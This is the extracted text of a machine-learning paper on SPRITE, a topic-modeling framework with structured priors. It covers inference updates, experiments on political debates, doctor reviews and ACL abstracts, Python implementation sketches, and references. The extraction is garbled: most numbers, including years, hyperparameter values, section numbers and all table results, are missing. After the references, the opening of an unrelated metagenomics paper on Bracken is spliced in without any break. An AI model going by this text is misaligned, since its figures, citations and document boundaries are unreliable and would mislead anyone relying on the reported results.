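the alternation between sampling and hyperparameter updates can be sketched in a few lines. the python below is a minimal, illustrative implementation of one monte carlo em step: a collapsed gibbs update for a single token in which the structured priors play the role of lda's hyperparameters, a gradient step on β using the digamma expression derived in the passage that follows, and an exponentiated-gradient step for simplex-constrained variables. all array names, shapes, and the gaussian hyperprior variance are assumptions made for the sketch, not the authors' implementation.

```python
import numpy as np
from scipy.special import digamma

rng = np.random.default_rng(0)

def sample_topic(m, v, n_mk, n_kv, n_k, theta_tilde, phi_tilde):
    """Collapsed Gibbs update for one token of word v in document m, with the
    structured priors theta_tilde (M x K) and phi_tilde (K x V) in place of
    LDA's alpha and beta. Count arrays exclude the token being resampled."""
    p = (n_mk[m] + theta_tilde[m]) * (n_kv[:, v] + phi_tilde[:, v]) \
        / (n_k + phi_tilde.sum(axis=1))
    p /= p.sum()
    return rng.choice(len(p), p=p)

def grad_beta(beta, omega, n_kv, sigma2=1.0):
    """Gradient of the collapsed log likelihood plus a 0-mean Gaussian
    hyperprior with respect to beta (K x C); the digamma terms follow the
    expression given in the text below."""
    phi_tilde = np.exp(beta @ omega)                       # K x V
    inner = (digamma(n_kv + phi_tilde) - digamma(phi_tilde)
             + digamma(phi_tilde.sum(1, keepdims=True))
             - digamma((n_kv + phi_tilde).sum(1, keepdims=True)))
    return (inner * phi_tilde) @ omega.T - beta / sigma2   # K x C

def exponentiated_gradient_step(x, grad, eta):
    """Update for simplex-constrained variables such as soft indicator vectors."""
    x = x * np.exp(eta * grad)
    return x / x.sum()

# One EM iteration then alternates: (1) a Gibbs sweep calling sample_topic for
# every token to refresh the count arrays, and (2) a gradient step such as
#   beta += eta * grad_beta(beta, omega, n_kv)
# with eta set per parameter, e.g. AdaGrad-style from accumulated squared gradients.
```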
the partial derivative of the collapsed log likelihood l of the corpus with respect to each hyperparameter βkc is:

∂l/∂βkc = ∂ log p(β)/∂βkc + ∑v ωcv φ̃kv ( Ψ(nkv + φ̃kv) − Ψ(φ̃kv) + Ψ(∑v′ φ̃kv′) − Ψ(∑v′ (nkv′ + φ̃kv′)) )

where φ̃kv = exp(∑c′ βkc′ ωc′v), nkv is the number of times word v is assigned to topic k (in the samples from the e-step), and Ψ is the digamma function, the derivative of the log of the gamma function. the digamma terms arise from the dirichlet-multinomial distribution, when integrating out the parameters φ. p(β) is the hyperprior. for a 0-mean gaussian hyperprior with variance σ², ∂ log p(β)/∂βkc = −βkc/σ². under a dirichlet(ρ) hyperprior, when we want β to represent an indicator vector (§ . . ), ∂ log p(β)/∂βkc = (ρ − 1)/βkc. the partial derivatives for the other hyperparameters are similar. rather than involving a sum over the vocabulary, ∂l/∂δck sums over documents, while ∂l/∂ωcv and ∂l/∂αmc sum over topics. our inference algorithm alternates between one gibbs iteration and one iteration of gradient ascent, so that the parameters change gradually. for unconstrained parameters, we use the update rule: x(t+1) = x(t) + ηt ∇l(x(t)), for some variable x and a step size ηt at iteration t. for parameters constrained to the simplex (such as when β is a soft indicator vector), we use exponentiated gradient ascent (kivinen and warmuth, ) with the update rule: xi(t+1) ∝ xi(t) exp(ηt ∇i l(x(t))). . tightening the constraints for variables that we prefer to be binary but have softened to continuous variables using sparse beta or dirichlet priors, we can straightforwardly strengthen the preference to be binary by modifying the objective function to favor the prior more heavily. specifically, under a dirichlet(ρ < 1) prior we will introduce a scaling parameter τt ≥ 0 to the prior log likelihood: τt log p(β), with partial derivative τt (ρ − 1)/βkc, which adds extra weight to the sparse dirichlet prior in the objective. the algorithm used in our experiments begins with a fixed initial value of τ and optionally increases τ over time. this is a deterministic annealing approach, where τ corresponds to an inverse temperature (ueda and nakano, ; smith and eisner, ). as τ approaches infinity, the prior-annealed map objective maxβ p(φ|β) p(β)^τ approaches a nested maximization: annealing only the prior p(β) results in maximization of this term only, while the outer max chooses a good β under p(φ|β) as a tie-breaker among all β values that maximize the inner max (binary-valued β). we show experimentally (§ . . ) that annealing the prior yields values that satisfy the constraints. other modifications could be made to the objective function to induce sparsity, such as entropy regularization (balasubramanyan and cohen, ). a factored hierarchical model of topic and perspective we will now describe a sprite model that encompasses nearly all of the structures and extensions described in § – , followed by experimental results using this model to jointly capture topic and "perspective" in a corpus of political debates (where perspective corresponds to ideology) and a corpus of online doctor reviews (where perspective corresponds to the review sentiment). first, we will create a topic hierarchy (§ . ).
the hierarchy will model both topics and documents, where αm is document m's supertopic proportions, δc is the cth supertopic's subtopic prior, ωc is the cth supertopic's word prior, and βk is the weight vector that selects the kth topic's parent supertopic, which incorporates (soft) indicator vectors to encode a tree structure (§ . . ). we want a weighted tree; while each βk has only one nonzero element, the nonzero element can be a value other than 1. we do this by replacing the single coefficient βkc with a product of two variables: bkcβ̂kc. here, β̂k is a real-valued weight vector, while bkc is a binary indicator vector which zeroes out all but one element of βk. we do the same with the δ vectors, replacing δck with bkcδ̂ck. the b variables are shared across both topic and document components, which is how we tie these together (§ . ). we relax the binary requirement and instead allow a positive real-valued vector whose elements sum to 1, with a dirichlet(ρ < 1) prior to encourage sparsity (§ . . ). to be properly interpreted as a hierarchy, we constrain the coefficients α and β (and by extension, δ) to be positive. to optimize these parameters in a mathematically convenient way, we write βkc as exp(log βkc), and instead optimize log βkc ∈ r rather than βkc ∈ r+. second, we factorize (§ . ) our hierarchy such that each topic depends not only on its supertopic, but also on a value indicating perspective. for example, a conservative topic about energy will appear differently from a liberal topic about energy. the prior for a topic will be a log-linear combination of both a supertopic (e.g. energy) and a perspective (e.g. liberal) weight vector. the variables associated with the perspective component are denoted with superscript (p) rather than subscript c. to learn meaningful perspective parameters, we include supervision in the form of document attributes (§ . ). each document includes a positive or negative score denoting the perspective, which is the variable α(p)m for document m. since α(p) are the coefficients for δ(p), positive values of δ(p)k indicate that topic k is more likely if the author is conservative (which has a positive α score in our data), and less likely if the author is liberal (which has a negative score). there is only a single perspective component, but it represents two ends of a spectrum with positive and negative weights; β(p) and δ(p) are not constrained to be positive, unlike the supertopics. we also set β(p)k = δ(p)k. this means that topics with positive δ(p)k will also have a positive β coefficient that is multiplied with the perspective word vector ω(p). finally, we include "bias" component vectors denoted ω(b) and δ(b), which act as overall weights over the vocabulary and topics, so that the component-specific ω and δ weights can be interpreted as deviations from the global bias weights. figure summarizes the model:
• bk ∼ dirichlet(ρ < 1) (soft indicator)
• α(p) is given as input (perspective value)
• δ(p)k = β(p)k
• φ̃kv = exp(ω(b)v + β(p)k ω(p)v + ∑c bkc β̂kc ωcv)
• θ̃mk = exp(δ(b)k + α(p)m δ(p)k + ∑c bkc αmc δ̂ck)
figure : summary of the hyperparameters in our sprite-based topic and perspective model (§ ). this includes most of the features described above (trees, factored structures, tying topic and document components, and document attributes), so we can ablate model features to measure their effect. experiments .
datasets and experimental setup we applied our models to two corpora: • debates: a set of floor debates from the th– th u.s. congress, collected by nguyen et al. ( ), who also applied a hierarchical topic model to this data. each document is a tran- script of one speaker’s turn in a debate, and each document includes the first dimension of the dw-nominate score (lewis and poole, ), a real-valued score indicating how conservative (positive) or liberal (negative) the speaker is. this value is α(p). we took a sample of , documents from the house debates ( , to- kens; , types), balanced across party affilia- tion. we sampled from the most partisan speak- ers, removing scores below the median value. • reviews: doctor reviews from ratemds.com, previously analyzed using flda (paul et al., ; wallace et al., ). the reviews con- tain ratings on a – scale for multiple aspects. we centered the ratings around the middle value , then took reviews that had the same sign for all aspects, and averaged the scores to produce a value for α(p). our corpus contains , documents ( , tokens; , types), bal- anced across positive/negative scores. unless otherwise specified, k= topics and c= components (excluding the perspective component) for debates, and k= and c= for reviews. these values were chosen as a qualita- tive preference, not optimized for predictive per- formance, but we experiment with different values in § . . . we set the step size ηt according to ada- grad (duchi et al., ), where the step size is the inverse of the sum of squared historical gradi- ents. we place a sparse dirichlet(ρ= . ) prior on the b variables, and apply weak regulariza- tion to all other hyperparameters via a n( , ) prior. these hyperparameters were chosen after only minimal tuning, and were selected because they showed stable and reasonable output qualita- tively during preliminary development. we ran our inference algorithm for itera- tions, estimating the parameters θ and φ by aver- aging the final iterations. our results are aver- aged across randomly initialized samplers. . evaluating the topic perspective model . . analysis of output figure shows examples of topics learned from the reviews corpus. the figure includes the high- est probability words in various topics as well as the highest weight words in the supertopic com- ponents and perspective component, which feed into the priors over the topic parameters. we see that one supertopic includes many words related to surgery, such as procedure and performed, and has multiple children, including a topic about dental work. another supertopic includes words describ- ing family members such as kids and husband. adagrad decayed too quickly for the b variables. for these, we used a variant suggested by zeiler ( ) which uses an average of historical gradients rather than a sum. our code and the data will be available at: http://cs.jhu.edu/˜mpaul. one topic has both supertopics as parents, which appears to describe surgeries that saved a family member’s life, with top words including {saved, life, husband, cancer}. the figure also illustrates which topics are associated more with positive or negative reviews, as indicated by the value of δ(p). interpretable parameters were also learned from the debates corpus. consider two topics about energy that have polar values of δ(p). the conservative-leaning topic is about oil and gas, with top words including {oil, gas, companies, prices, drilling}. 
the liberal-leaning topic is about renewable energy, with top words including {energy, new, technology, future, renewable}. both of these topics share a common parent of an industry-related supertopic whose top words are {industry, companies, market, price}. a nonpartisan topic under this same supertopic has top words {credit, financial, loan, mortgage, loans}. . . quantitative evaluation we evaluated the model on two predictive tasks as well as topic quality. the first metric is perplexity of held-out text. the held-out set is based on tokens rather than documents: we trained on even numbered tokens and tested on odd tokens. this is a type of "document completion" evaluation (wallach et al., b) which measures how well the model can predict held-out tokens of a document after observing only some. we also evaluated how well the model can predict the attribute value (dw-nominate score or user rating) of the document. we trained a linear regression model using the document topic distributions θ as features. we held out half of the documents for testing and measured the mean absolute error. when estimating document-specific sprite parameters for held-out documents, we fix the feature value α(p)m = 0 for that document. these predictive experiments do not directly measure performance at many of the particular tasks that topic models are well suited for, like data exploration, summarization, and visualization. we therefore also include a metric that more directly measures the quality and interpretability of topics. we use the topic coherence metric introduced by mimno et al. ( ), which is based on co-occurrence statistics among each topic's most probable words and has been shown to correlate with human judgments of topic quality. this metric measures the quality of each topic, and we
measure the average coherence across all topics:

(1/k) ∑k ∑m=2..m ∑l=1..m−1 log ( (df(vkm, vkl) + 1) / df(vkl) ) ( )

where df(v,w) is the document frequency of words v and w (the number of documents in which they both occur), df(v) is the document frequency of word v, and vki is the ith most probable word in topic k. we use the top m = words. this metric is limited to measuring only the quality of word clusters, ignoring the potentially improved interpretability of organizing the data into certain structures. however, it is still useful as an alternative measure of performance and utility, independent of the models' predictive abilities.
figure : examples of topics (gray boxes) and components (colored boxes) learned on the reviews corpus with topics and components. words with the highest and lowest values of ω(p), the perspective component, are shown on the left, reflecting positive and negative sentiment words. the words with largest ω values in two supertopic components are also shown, with manually given labels ("surgery" and "family"). arrows from components to topics indicate that the topic's word distribution draws from that component in its prior (with non-zero β value). there are also implicit arrows from the perspective component to all topics (omitted for clarity). the vertical positions of topics reflect the topic's perspective value δ(p). topics centered above the middle line are more likely to occur in reviews with positive scores, while topics below the middle line are more likely in negative reviews. note that this is a "soft" hierarchy because the tree structure is not strictly enforced, so some topics have multiple parent components. table shows how strict trees can be learned by tuning the annealing parameter.
using these three metrics, we compared to several variants (denoted in bold) of the full model to understand how the different parts of the model affect performance:
• variants that contain the hierarchy components but not the perspective component (hierarchy only), and vice versa (perspective only).
• the "hierarchy only" model using only document components δ and no topic components. this is a pam-style model because it exhibits similar behavior to pam (§ . ). we also compared to the original pam model.
• the "hierarchy only" model using only topic components ω and no document components. this is a sctm-style model because it exhibits similar behavior to sctm (§ . ).
• the full model where α(p) is learned rather than given as input. this is a flda-style model that has similar behavior to flda (§ . ). we also compared to the original flda model.
• the "perspective only" model but without the ω(p) topic component, so the attribute value affects only the topic distributions and not the word distributions. this is identical to the dmr model of mimno and mccallum ( ) (§ . ).
• a model with no components except for the bias vectors ω(b) and δ(b). this is equivalent to lda with optimized hyperparameters (learned). we also experimented with using fixed symmetric hyperparameters, using values suggested by griffiths and steyvers ( ): /k and . for topic and word distributions.
to put the results in context, we also compare to two types of baselines: ( ) "bag of words" baselines, where we measure the perplexity of add-one smoothed unigram language models, we measure the prediction error using bag of words features, and we measure coherence of the unigram distribution; ( ) naive baselines, where we measure the perplexity of the uniform distribution over each dataset's vocabulary, the prediction error when simply predicting each attribute as the mean value in the training set, and the coherence of randomly selected words (repeated for trials).
table : perplexity of held-out tokens and mean absolute error for attribute prediction using various models (± std. error). rows: full model, hierarchy only, perspective only, sctm-style, pam-style, flda-style, dmr, pam, flda, lda (learned), lda (fixed), bag of words, and naive baseline; columns: perplexity, prediction error, and coherence for each of debates and reviews. † indicates significant improvement (p < . ) over optimized lda under a two-sided t-test.
table shows that the full sprite model substantially outperforms the lda baseline at both predictive tasks. generally, model variants with more structure perform better predictively. the difference between sctm-style and pam-style is that the former uses only topic components (for word distributions) and the latter uses only document components (for the topic distributions). results show that the structured priors are more important for topic than word distributions, since pam-style has lower perplexity on both datasets. however, models with both topic and document components generally outperform either alone, including comparing the perspective only and dmr models. the former includes both topic and document perspective components, while dmr has only a document level component. pam does not significantly outperform optimized lda in most measures, likely because it updates the hyperparameters using a moment-based approximation, which is less accurate than our gradient-based optimization. flda perplexity is . % higher than optimized lda on reviews, comparable to the % reported by paul and dredze ( ) on a different corpus. the flda-style sprite variant, which is more flexible, significantly outperforms flda in most measures. the results are quite different under the coherence metric. it seems that topic components (which influence the word distributions) improve coherence over lda, while document components worsen coherence. sctm-style (which uses only topic components) does the best in both datasets, while pam-style (which uses only documents) does the worst. pam also significantly improves over lda, despite worse perplexity. the lda (learned) baseline substantially outperforms lda (fixed) in all cases, highlighting the importance of optimizing hyperparameters, consistent with prior research (wallach et al., a). surprisingly, many sprite variants also outperform the bag of words regression baseline, even though the latter was tuned to optimize performance using heavy ℓ regularization, which we applied only weakly (without tuning) to the topic model features. we also point out that the "bag of words" version of the coherence metric (the coherence of the top words) is higher than the average topic coherence, which is an artifact of how the metric is defined: the most probable words in the corpus also tend to co-occur together in most documents, so these words are considered to be highly coherent when grouped together.
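the coherence computation defined above is straightforward to implement. the python sketch below follows the definition directly; the toy documents and the guard against a zero document frequency are our own additions for the example.

```python
import numpy as np
from collections import Counter
from itertools import combinations

def average_coherence(top_words_per_topic, documents):
    """Average topic coherence of Mimno et al.: for each topic, sum over ordered
    pairs of its top words of log((DF(v_m, v_l) + 1) / DF(v_l)), where v_l is the
    more probable word of the pair, then average across topics."""
    doc_sets = [set(d) for d in documents]
    df = Counter()                     # document frequency of single words
    codf = Counter()                   # document frequency of word pairs
    for s in doc_sets:
        df.update(s)
        codf.update(combinations(sorted(s), 2))

    def co(a, b):
        return codf[tuple(sorted((a, b)))]

    scores = []
    for words in top_words_per_topic:  # each list ordered from most probable down
        score = sum(np.log((co(words[m], words[l]) + 1.0) / max(df[words[l]], 1))
                    for m in range(1, len(words)) for l in range(m))
        scores.append(score)
    return float(np.mean(scores))

# Toy example.
docs = [["energy", "oil", "gas"], ["energy", "renewable", "technology"], ["oil", "price"]]
print(average_coherence([["energy", "oil", "renewable"]], docs))
```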
parameter sensitivity we evaluated the full model at the two predictive tasks with varying numbers of topics ({ , , , } for debates and { , , , } for reviews) and components ({ , , , }). figure shows that performance is more sensitive to the number of topics than components, with generally less variance among the latter. more topics improve performance monotonically on debates, while performance declines at topics on reviews. the middle range of components ( – ) tends to perform better than too few ( ) or too many ( ) components.
figure : predictive performance of full model with different numbers of topics k across different numbers of components, represented on the x-axis (log scale). (the panels plot perplexity and prediction error against the number of components for debates and reviews, with one curve per number of topics k.)
table : the percentage of indicator values that are sparse (near 0 or 1) when using different annealing schedules, for debates and reviews. rows: two constant settings of τ (labeled sparse dag and soft tree) and two exponential schedules τt (both labeled hard tree).
regardless of quantitative differences, the choice of parameters may depend on the end application and the particular structures that the user has in mind, if interpretability is important. for example, if the topic model is used as a visualization tool, then components would not likely result in an interesting hierarchy to the user, even if this setting produces low perplexity. structured sparsity we use a relaxation of the binary b that induces a "soft" tree structure. table shows the percentage of b values which are within ε = . of 0 or 1 under various annealing schedules, increasing the inverse temperature τ by . % after each iteration (i.e. τt = . t) as well as . % and no annealing at all (τ = ). at τ = , we model a dag rather than a tree, because the model has no preference that b is sparse. many of the values are binary in the dag case, but the sparse prior substantially increases the number of binary values, obtaining fully binary structures with sufficient annealing. we compare the dag and tree structures more in the next subsection. . structure comparison the previous subsection experimented with models that included a variety of structures, but did not provide a comparison of each structure in isolation, since most model variants were part of a complex joint model. in this section, we experiment with the basic sprite model for the three structures described in § : a dag, a tree, and a factored forest. for each structure, we also experiment with each type of component: document, topic, and both types (combined). for this set of experiments, we included a third dataset that does not contain a perspective value:
• abstracts: a set of abstracts from the acl anthology ( , tokens; , types). these abstracts have previously been analyzed with flda (paul and dredze, ), so we include it here to see if the factored structure that we explore in this section learns similar patterns.
based on our sparsity experiments in the previous subsection, we set τt = . t to induce hard structures (tree and factored) and τ = to induce a dag. we keep the same parameters as the previous subsection: k= and c= for debates and k= and c= for reviews. for the factored structures, we use two factors, with one factor having more components than the other: and components for debates, and and components for reviews (the total number of components across the two factors is therefore the same as for the dag and tree experiments). the abstracts experiments use the same parameters as with debates. since the abstracts dataset does not have a perspective value to predict, we do not include prediction error as a metric, instead focusing on held-out perplexity and topic coherence (eq. ). table shows the results of these two metrics.
table : quantitative results for different structures (columns) and different components (rows) for two metrics (± std. error) across three datasets. the best (structure, component) pair for each dataset and metric is in bold. rows: document, topic, and combined components for each of debates, reviews, and abstracts; columns: perplexity and coherence under the dag, tree, and factored structures.
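the three structures compared here differ only in how the indicator variables b constrain which components feed each topic's prior. the short python sketch below builds illustrative masks of each kind; the sizes, factor grouping, and random draws are assumptions for exposition only.

```python
import numpy as np

rng = np.random.default_rng(0)
K, C = 6, 4                      # illustrative numbers of topics and components

# DAG: no structural constraint; each topic may draw on any subset of components.
b_dag = rng.dirichlet(np.full(C, 0.5), size=K)        # soft memberships per topic

# Tree: each topic has exactly one parent component (one nonzero entry per row).
parents = rng.integers(0, C, size=K)
b_tree = np.zeros((K, C))
b_tree[np.arange(K), parents] = 1.0

# Factored forest: components are split into factors and each topic takes
# exactly one parent from each factor (here two factors of two components each).
factors = [[0, 1], [2, 3]]
b_factored = np.zeros((K, C))
for k in range(K):
    for group in factors:
        b_factored[k, rng.choice(group)] = 1.0

# During training the rows of b live on the simplex and are pushed toward such
# 0/1 patterns by the sparse Dirichlet prior, with annealing tightening the
# structure as described in the structured sparsity discussion above.
print(b_dag.round(2), b_tree, b_factored, sep="\n\n")
```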
some trends are clear and consistent. topic components always hurt perplexity, while these components typically improve coherence, as was observed in the previous subsection. it has previously been observed that perplexity and topic quality are not correlated (chang et al., ). these results show that the choice of components depends on the task at hand. combining the two components tends to produce results somewhere in between, suggesting that using both component types is a reasonable "default" setting. document components usually improve perplexity, likely due to the nature of the document completion setup, in which half of each document is held out. the document components capture correlations between topics, so by inferring the components that generated the first half of the document, the prior is adjusted to give more probability to topics that are likely to occur in the unseen second half. another interesting trend is that the factored structure tends to perform well under both metrics, with the lowest perplexity and highest coherence in a majority of the nine comparisons (i.e. each row). perhaps the models are capturing a natural factorization present in the data. to understand the factored structure qualitatively, figure shows examples of components from each factor along with example topics that draw from all pairs of these components, learned on abstracts. we find that the factor with the smaller number of components (left of the figure) seems to decompose into components representing the major themes or disciplines found in acl abstracts, with one component expressing computational approaches (top) and the other expressing linguistic theory (bottom). the third component (not shown) has words associated with speech, including {spoken, speech, recognition}. the factor shown on the right seems to decompose into different research topics: one component represents semantics (top), another syntax (bottom), with others including morphology (top words including {segmentation, chinese, morphology}) and information retrieval (top words including {documents, retrieval, ir}). many of the topics intuitively follow from the components of these two factors. for example, the two topics expressing vector space models and distributional semantics (top left and right) both draw from the "computational" and "semantics" components, while the topics expressing ontologies and question answering (middle left and right) draw from "linguistics" and "semantics". the factorization is similar to what had previously been induced by flda.
figure of paul and dredze ( ) shows components that look similar to the computational methods and linguistic theory components here, and the factor with the largest number of components also decomposes by research topic. these results show that sprite is capable of recovering similar structures as flda, a more specialized model. sprite is also much more flexible than flda. while flda strictly models a one-to-one mapping of topics to each pair of components, sprite allows multiple topics to belong to the same pair (as in the semantics examples above), and conversely sprite does not require that all pairs have an associated topic. this property allows sprite to scale to larger numbers of factors than flda, because the number of topics is not required to grow with the number of all possible tuples.
figure : examples of topics (gray boxes) and components (colored boxes) learned on the abstracts corpus with topics using a factored structure. the components have been grouped into two factors, one factor with components (left) and one with (right), with two examples shown from each (labeled "computational" and "linguistics", and "semantics" and "syntax", respectively). each topic prior draws from exactly one component from each factor.
related work our topic and perspective model is related to supervised hierarchical lda (shlda) (nguyen et al., ), which learns a topic hierarchy while also learning regression parameters to associate topics with feature values such as political perspective. this model does not explicitly incorporate perspective-specific word priors into the topics (as in our factorized approach). the regression structure is also different. shlda is a "downstream" model, where the perspective value is a response variable conditioned on the topics. in contrast, sprite is an "upstream" model, where the topics are conditioned on the perspective value. we argue that the latter is more accurate as a generative story (the emitted words depend on the author's perspective, not the other way around). moreover, in our model the perspective influences both the word and topic distributions (through the topic and document components, respectively). inverse regression topic models (rabinovich and blei, ) use document feature values (such as political ideology) to alter the parameters of the topic-specific word distributions. this is an alternative to the more common approach to regression based topic modeling, where the variables affect the topic distributions rather than the word distributions.
our sprite-based model does both: the document features adjust the prior over topic dis- tributions (through δ), but by tying together the document and topic components (with β), the doc- ument features also affect the prior over word dis- tributions. to the best of our knowledge, this is the first topic model to condition both topic and word distributions on the same features. the topic aspect model (paul and girju, a) is also a two-dimensional factored model that has been used to jointly model topic and perspective (paul and girju, b). however, this model does not use structured priors over the parameters, unlike most of the models discussed in § . an alternative approach to incorporating user preferences and expertise are interactive topic models (hu et al., ), a complimentary ap- proach to sprite. discussion and conclusion we have presented sprite, a family of topic mod- els that utilize structured priors to induce pre- ferred topic structures. specific instantiations of sprite are similar or equivalent to several exist- ing topic models. we demonstrated the utility of sprite by constructing a single model with many different characteristics, including a topic hierar- chy, a factorization of topic and perspective, and supervision in the form of document attributes. these structures were incorporated into the pri- ors of both the word and topic distributions, unlike most prior work that considered one or the other. our experiments explored how each of these var- ious model features affect performance, and our results showed that models with structured priors perform better than baseline lda models. our framework has made clear advancements with respect to existing structured topic models. for example, sprite is more general and of- fers simpler inference than the shared compo- nents topic model (gormley et al., ), and sprite allows for more flexible and scalable fac- tored structures than flda, as described in earlier sections. both of these models were motivated by their ability to learn interesting structures, rather than their performance at any predictive task. sim- ilarly, our goal in this study was not to provide state of the art results for a particular task, but to demonstrate a framework for learning struc- tures that are richer than previous structured mod- els. therefore, our experiments focused on un- derstanding how sprite compares to commonly used models with similar structures, and how the different variants compare under different metrics. ultimately, the model design choice depends on the application and the user needs. by unifying such a wide variety of topic models, sprite can serve as a common framework for enabling model exploration and bringing application-specific pref- erences and structure into topic models. acknowledgments we thank jason eisner and hanna wallach for helpful discussions, and viet-an nguyen for pro- viding the congressional debates data. michael paul is supported by a microsoft research phd fellowship. references d. andrzejewski, x. zhu, and m. craven. . in- corporating domain knowledge into topic modeling via dirichlet forest priors. in icml. r. balasubramanyan and w. cohen. . regular- ization of latent variable models to obtain sparsity. in siam conference on data mining. d. blei and j. lafferty. . a correlated topic model of science. annals of applied statistics, ( ): – . d. blei, t. griffiths, m. jordan, and j. tenenbaum. a. hierarchical topic models and the nested chinese restaurant process. in nips. d. blei, a. ng, and m. jordan. b. 
latent dirichlet allocation. jmlr. j. chang, j. boyd-graber, s. gerrish, c. wang, and d. blei. . reading tea leaves: how humans interpret topic models. in nips. j. duchi, e. hazan, and y. singer. . adaptive sub- gradient methods for online learning and stochastic optimization. jmlr, : – . j. eisenstein, a. ahmed, and e. p. xing. . sparse additive generative models of text. in icml. m.r. gormley, m. dredze, b. van durme, and j. eis- ner. . shared components topic models. in naacl. t. griffiths and m. steyvers. . finding scientific topics. in proceedings of the national academy of sciences of the united states of america. y. hu, j. boyd-graber, b. satinoff, and a. smith. . interactive topic modeling. machine learn- ing, : – . j. kivinen and m.k. warmuth. . exponentiated gradient versus gradient descent for linear predic- tors. information and computation, : – . j.b. lewis and k.t. poole. . measuring bias and uncertainty in ideal point estimates via the paramet- ric bootstrap. political analysis, ( ): – . w. li and a. mccallum. . pachinko alloca- tion: dag-structured mixture models of topic cor- relations. in international conference on machine learning. d. mimno and a. mccallum. . topic mod- els conditioned on arbitrary features with dirichlet- multinomial regression. in uai. d. mimno, w. li, and a. mccallum. . mixtures of hierarchical topics with pachinko allocation. in international conference on machine learning. d. mimno, h.m. wallach, e. talley, m. leenders, and a. mccallum. . optimizing semantic coher- ence in topic models. in emnlp. v. nguyen, j. boyd-graber, and p. resnik. . lex- ical and hierarchical topic regression. in neural in- formation processing systems. m.j. paul and m. dredze. . factorial lda: sparse multi-dimensional text models. in neural informa- tion processing systems (nips). m.j. paul and m. dredze. . drug extraction from the web: summarizing drug experiences with multi- dimensional topic models. in naacl. m. paul and r. girju. a. a two-dimensional topic-aspect model for discovering multi-faceted topics. in aaai. m.j. paul and r. girju. b. summarizing con- trastive viewpoints in opinionated text. in empirical methods in natural language processing. m.j. paul, b.c. wallace, and m. dredze. . what affects patient (dis)satisfaction? analyzing online doctor ratings with a joint topic-sentiment model. in aaai workshop on expanding the boundaries of health informatics using ai. m. rabinovich and d. blei. . the inverse regres- sion topic model. in international conference on machine learning. d. ramage, d. hall, r. nallapati, and c.d. man- ning. . labeled lda: a supervised topic model for credit attribution in multi-labeled corpora. in emnlp. n.a. smith and j. eisner. . annealing structural bias in multilingual weighted grammar induction. in coling-acl. e.m. talley, d. newman, d. mimno, b.w. herr ii, h.m. wallach, g.a.p.c. burns, m. leenders, and a. mccallum. . database of nih grants us- ing machine-learned categories and graphical clus- tering. nature methods, ( ): – . n. ueda and r. nakano. . deterministic anneal- ing em algorithm. neural networks, ( ): – . b.c. wallace, m.j. paul, u. sarkar, t.a. trikalinos, and m. dredze. . a large-scale quantitative analysis of latent factors and sentiment in online doctor reviews. journal of the american medical informatics association, ( ): – . h.m. wallach, d. mimno, and a. mccallum. a. rethinking lda: why priors matter. in nips. h.m. wallach, i. murray, r. salakhutdinov, and d. mimno. b. evaluation methods for topic models. in icml. 
c. wang and d. blei. . decoupling sparsity and smoothness in the discrete hierarchical dirich- let process. in nips. m.d. zeiler. . adadelta: an adaptive learning rate method. corr, abs/ . . submitted july accepted november published january corresponding author jennifer lu, jlu @jhmi.edu academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright lu et al. distributed under creative commons cc-by . open access bracken: estimating species abundance in metagenomics data jennifer lu , , florian p. breitwieser , peter thielen and steven l. salzberg , , department of biomedical engineering, johns hopkins university, baltimore, md, united states center for computational biology, mckusick-nathans institute of genetic medicine, johns hopkins school of medicine, baltimore, md, united states applied physics laboratory, johns hopkins university, laurel, md, united states departments of computer science and biostatistics, johns hopkins university, baltimore, md, united states abstract metagenomic experiments attempt to characterize microbial communities using high-throughput dna sequencing. identification of the microorganisms in a sample provides information about the genetic profile, population structure, and role of microorganisms within an environment. until recently, most metagenomics studies focused on high-level characterization at the level of phyla, or alternatively sequenced the s ribosomal rna gene that is present in bacterial species. as the cost of sequencing has fallen, though, metagenomics experiments have increasingly used unbiased shotgun sequencing to capture all the organisms in a sample. this approach requires a method for estimating abundance directly from the raw read data. here we describe a fast, accurate new method that computes the abundance at the species level using the reads collected in a metagenomics experiment. bracken (bayesian reestimation of abundance after classification with kraken) uses the taxonomic assignments made by kraken, a very fast read-level classifier, along with information about the genomes themselves to estimate abundance at the species level, the genus level, or above. we demonstrate that bracken can produce accurate species- and genus-level abundance estimates even when a sample contains multiple near-identical species. subjects bioinformatics, computational biology keywords metagenomics, species abundance, microbiome, bayesian estimation introduction metagenomics is a rapidly growing field of study, driven in part by our ability to generate enormous amounts of dna sequence rapidly and inexpensively. since the human genome was first published in (the international human genome sequencing consortium, ; venter et al., ), sequencing technology has become approximately one million times faster and cheaper, making it possible for individual labs to generate as much sequence data as the entire human genome project in just a few days. in the context of metagenomics experiments, this makes it possible to sample a complex mixture of microbes by ‘‘shotgun’’ sequencing, which involves simply isolating dna, preparing the dna for sequencing, and sequencing the mixture as deeply as possible. shotgun sequencing is relatively unbiased compared to targeted sequencing methods (venter et al., ), including widely-used s ribosomal rna sequencing, and it has the additional advantage that it captures any species how to cite this article lu et al. ( ), bracken: estimating species abundance in metagenomics data. 
peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jlu @jhmi.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. with a dna-based genome, including eukaryotes that lack a s rrna gene. because it is unbiased, shotgun sequencing can also be used to estimate the abundance of each taxon (species, genus, phylum, etc.) in the original sample, by counting the number of reads belonging to each taxon. along with the technological advances, the number of finished and draft genomes has also grown exponentially over the past decade. at present there are thousands of complete bacterial genomes, , draft bacterial genomes, and , full or partial virus genomes in the public genbank archive (benson et al., ). this rich resource of sequenced genomes now makes it possible to sequence uncultured, unprocessed microbial dna from almost any environment, ranging from soil to the deep ocean to the human body, and use computational sequence comparisons to identify many of the formerly hidden species in these environments (riesenfeld, schloss & handelsman, ). several accurate methods have appeared that can align a sequence ‘‘read’’ to a database of microbial genomes rapidly and accurately (see below), but this step alone is not sufficient to estimate how much of a species is present. complications arise when closely related species are present in the same sample–a situation that arises quite frequently–because many reads align equally well to more than one species. this requires a separate abundance estimation algorithm to resolve. in this paper, we describe a new method, bracken, that goes beyond simply classifying individual reads and computes the abundance of species, genera, or other taxonomic categories from the dna sequences collected in a metagenomics experiment. when it was first published in , the kraken metagenomics classifier represented a major enhancement in the speed with which large metagenomics sequence data could be processed (wood & salzberg, ), running over times faster than megablast (morgulis et al., ), the closest competitor at the time. kraken’s success and accuracy rely on its use of a very large, efficient index of short sequences of length k, which it builds into a specialized database. if 